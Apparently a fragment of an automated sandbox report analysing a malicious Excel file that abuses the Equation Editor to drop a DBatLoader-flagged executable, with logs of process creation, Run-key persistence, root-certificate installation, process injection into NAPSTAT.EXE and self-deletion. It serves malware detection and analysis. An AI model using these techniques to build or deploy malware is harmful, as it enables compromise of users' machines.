              Source: C:\Users\user\Odhbljup.exe, Code function: String function: 0040E2B4 appears 42 times
              Source: C:\Users\user\Odhbljup.exe, Code function: String function: 0040F5BC appears 44 times
              Source: C:\Users\user\Odhbljup.exe, Code function: String function: 004067E4 appears 122 times
              Source: C:\Users\user\Odhbljup.exe, Code function: String function: 00404308 appears 46 times
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: String function: 02013F92 appears 132 times
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: String function: 0201373B appears 248 times
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: String function: 01FCE2A8 appears 58 times
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: String function: 01FCDF5C appears 124 times
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: String function: 0203F970 appears 84 times
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_00450FCC NtdllDefWindowProc_A,
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_0044629C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_00436A08 NtdllDefWindowProc_A,GetCapture,
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_0042BE54 NtdllDefWindowProc_A,
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_02128690 NtReadFile,
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_021287C0 NtAllocateVirtualMemory,
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_021285E0 NtCreateFile,
              Source: C:\Users\user\Odhbljup.exe, Code function: 7_2_00450FCC NtdllDefWindowProc_A,
              Source: C:\Users\user\Odhbljup.exe, Code function: 7_2_0044629C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,
              Source: C:\Users\user\Odhbljup.exe, Code function: 7_2_00436A08 NtdllDefWindowProc_A,GetCapture,
              Source: C:\Users\user\Odhbljup.exe, Code function: 7_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
              Source: C:\Users\user\Odhbljup.exe, Code function: 7_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
              Source: C:\Users\user\Odhbljup.exe, Code function: 7_2_0042BE54 NtdllDefWindowProc_A,
              Source: C:\Users\user\Odhbljup.exe, Code function: 10_2_00450FCC NtdllDefWindowProc_A,
              Source: C:\Users\user\Odhbljup.exe, Code function: 10_2_0044629C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,
              Source: C:\Users\user\Odhbljup.exe, Code function: 10_2_00436A08 NtdllDefWindowProc_A,GetCapture,
              Source: C:\Users\user\Odhbljup.exe, Code function: 10_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
              Source: C:\Users\user\Odhbljup.exe, Code function: 10_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
              Source: C:\Users\user\Odhbljup.exe, Code function: 10_2_0042BE54 NtdllDefWindowProc_A,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FC00C4 NtCreateFile,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FC07AC NtCreateMutant,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBF9F0 NtClose,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBF900 NtReadFile,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBFBB8 NtQueryInformationToken,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBFB68 NtFreeVirtualMemory,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBFB50 NtCreateKey,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBFAE8 NtQueryInformationProcess,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBFAB8 NtQueryValueKey,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBFDC0 NtQuerySystemInformation,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBFD8C NtDelayExecution,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBFC60 NtMapViewOfSection,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBFFB4 NtCreateSection,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FC01D4 NtSetValueKey,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FC1148 NtOpenThread,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FC010C NtOpenDirectoryObject,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FC10D0 NtOpenProcessToken,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FC0078 NtResumeThread,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FC0060 NtQuerySection,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FC0048 NtProtectVirtualMemory,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBF938 NtWriteFile,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FC1930 NtSetContextThread,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBF8CC NtWaitForSingleObject,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBFBE8 NtQueryVirtualMemory,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBFA50 NtEnumerateValueKey,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBFA20 NtQueryInformationFile,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FC1D80 NtSuspendThread,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBFD5C NtEnumerateKey,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBFC90 NtUnmapViewOfSection,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBFC48 NtSetInformationFile,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FC0C40 NtGetContextThread,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBFC30 NtOpenProcess,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBFFFC NtCreateProcessEx,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBFF34 NtQueueApcThread,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBFEA0 NtReadVirtualMemory,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_01FBFE24 NtWriteVirtualMemory,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_000985E0 NtCreateFile,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 12_2_00098690 NtReadFile,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00098710 NtClose,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_000987C0 NtAllocateVirtualMemory,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00396A82 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00396F06 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00396F12 NtQueryInformationProcess,
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$7009.xlsxJump to behavior
              Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@11/33@8/2
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00423F40 GetLastError,FormatMessageA,
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Odhbljup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Odhbljup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Odhbljup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Odhbljup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Odhbljup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Odhbljup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0041C8A8 FindResourceA,LoadResource,SizeofResource,LockResource,
              Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
              Source: 7009.xlsxVirustotal: Detection: 35%
              Source: 7009.xlsxReversingLabs: Detection: 40%
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.v.b.c...e.x.e...................0.......................2.......................
              Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........@1........4.t...........0.......................&.......................
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\Odhbljup.exe "C:\Users\user\Odhbljup.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\Odhbljup.exe "C:\Users\user\Odhbljup.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
              Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\Odhbljup.exe "C:\Users\user\Odhbljup.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\Odhbljup.exe "C:\Users\user\Odhbljup.exe"
              Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InProcServer32
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE55E.tmpJump to behavior
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00408B32 GetDiskFreeSpaceA,
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Odhbljup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Odhbljup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Odhbljup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Odhbljup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000003.515473783.0000000004C20000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.567269073.0000000004DB0000.00000040.00000001.sdmp, vbc.exe, 00000004.00000003.514018824.0000000004AC0000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.567928489.0000000004F30000.00000040.00000001.sdmp, NAPSTAT.EXE
              Source: Binary string: napstat.pdb source: vbc.exe, 00000004.00000002.563648923.0000000003CF0000.00000040.00020000.sdmp, vbc.exe, 00000004.00000003.557853611.0000000004911000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected DBatLoader
Source: Yara match | File source: 10.3.Odhbljup.exe.1d02094.286.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.3.Odhbljup.exe.1d6d598.277.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.3.Odhbljup.exe.1d82094.284.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.vbc.exe.31d598.276.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.vbc.exe.332094.286.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.vbc.exe.331ef4.277.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.3.Odhbljup.exe.1d6d594.281.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.Odhbljup.exe.1ced598.277.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.3.Odhbljup.exe.1d6d598.275.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.3.Odhbljup.exe.1d81ef4.276.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.vbc.exe.31d620.283.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.vbc.exe.31d598.275.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.Odhbljup.exe.1ced594.279.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.Odhbljup.exe.1d01ef4.276.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.Odhbljup.exe.1ced598.275.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.vbc.exe.331ef4.278.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.3.Odhbljup.exe.1d6d620.283.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.Odhbljup.exe.1ced594.281.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.Odhbljup.exe.1ced620.283.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.vbc.exe.331f44.281.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.vbc.exe.31d594.280.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.3.Odhbljup.exe.1d81f44.280.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.31d734.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.Odhbljup.exe.1d01f44.280.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000003.480010544.0000000000320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.541642413.0000000001D5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.479622331.000000000031C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.479715174.000000000030C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.540973597.0000000001D5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.566824102.0000000001CF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.478861422.000000000030C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.541230145.0000000001D6C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.566299990.0000000001D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.541187560.0000000001D5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.541036876.0000000001D6C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.566467574.0000000001CEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.541516401.0000000001D80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.478734155.0000000000334000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.478780322.000000000030C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.541395274.0000000001D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.478805681.000000000031C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.479654433.0000000000334000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.480122394.000000000030C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.565869963.0000000001D04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.566017629.0000000001CDC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.566757773.0000000001CDC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.566404823.0000000001CDC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.541266508.0000000001D84000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.566183618.0000000001CEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.566603029.0000000001D04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.478831765.0000000000330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.541317929.0000000001D5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.559751606.000000000031C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.540909993.0000000001D84000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.567012932.0000000001CDC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.566928975.0000000001D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.480088573.0000000000330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.541124265.0000000001D80000.00000004.00000001.sdmp, type: MEMORY
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0043DD6C push 0043DDF9h; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00458108 push 00458140h; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0042A1F4 push 0042A220h; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_004201F8 push ecx; mov dword ptr [esp], edx
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00458180 push 004581ACh; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0042A1AC push 0042A1EAh; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0045A1B4 push 0045A427h; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0042A22C push 0042A264h; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0042C294 push 0042C2D7h; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00406340 push 00406391h; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0042C30C push 0042C338h; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00428448 push 00428518h; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0042A550 push 0042A57Ch; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040E5F8 push 0040E624h; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00406588 push 004065B4h; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00406600 push 0040662Ch; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00414628 push ecx; mov dword ptr [esp], eax
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00428628 push 00428654h; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0042A6FC push 0042A728h; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0041C6A4 push ecx; mov dword ptr [esp], edx
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00440764 push 00440790h; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_004547B8 push 004547F0h; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_004288FC push 00428928h; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0045A958 push 0045A984h; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0042C918 push 0042C971h; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_004289F8 push 00428A24h; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0041C9FF pushfd ; retf 0041h
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0045A990 push 0045A9B6h; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0042C9B4 push 0042C9ECh; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0042CA48 push 0042CA74h; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0043EA9C push ecx; mov dword ptr [esp], edx
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00459820 LoadLibraryA,GetProcAddress,
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe | File created: C:\Users\user\Odhbljup.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe | File created: C:\Users\user\Odhbljup.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe | File created: C:\Users\user\Odhbljup.exe
Source: C:\Users\Public\vbc.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Odhbljup
Source: C:\Users\Public\vbc.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Odhbljup
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00451054 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0044E03C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0043812C IsIconic,GetCapture,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_004389E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00428C3C IsIconic,GetWindowPlacement,GetWindowRect,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00439260 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
Source: C:\Users\user\Odhbljup.exe | Code function: 7_2_00451054 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
Source: C:\Users\user\Odhbljup.exe | Code function: 7_2_0044E03C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
Source: C:\Users\user\Odhbljup.exe | Code function: 7_2_0043812C IsIconic,GetCapture,
Source: C:\Users\user\Odhbljup.exe | Code function: 7_2_004389E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
Source: C:\Users\user\Odhbljup.exe | Code function: 7_2_00428C3C IsIconic,GetWindowPlacement,GetWindowRect,
Source: C:\Users\user\Odhbljup.exe | Code function: 7_2_00439260 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
Source: C:\Users\user\Odhbljup.exe | Code function: 7_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
Source: C:\Users\user\Odhbljup.exe | Code function: 7_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
Source: C:\Users\user\Odhbljup.exe | Code function: 10_2_00451054 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
Source: C:\Users\user\Odhbljup.exe | Code function: 10_2_0044E03C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
Source: C:\Users\user\Odhbljup.exe | Code function: 10_2_0043812C IsIconic,GetCapture,
Source: C:\Users\user\Odhbljup.exe | Code function: 10_2_004389E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
Source: C:\Users\user\Odhbljup.exe | Code function: 10_2_00428C3C IsIconic,GetWindowPlacement,GetWindowRect,
Source: C:\Users\user\Odhbljup.exe | Code function: 10_2_00439260 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
Source: C:\Users\user\Odhbljup.exe | Code function: 10_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
Source: C:\Users\user\Odhbljup.exe | Code function: 10_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
Source: C:\Users\Public\vbc.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
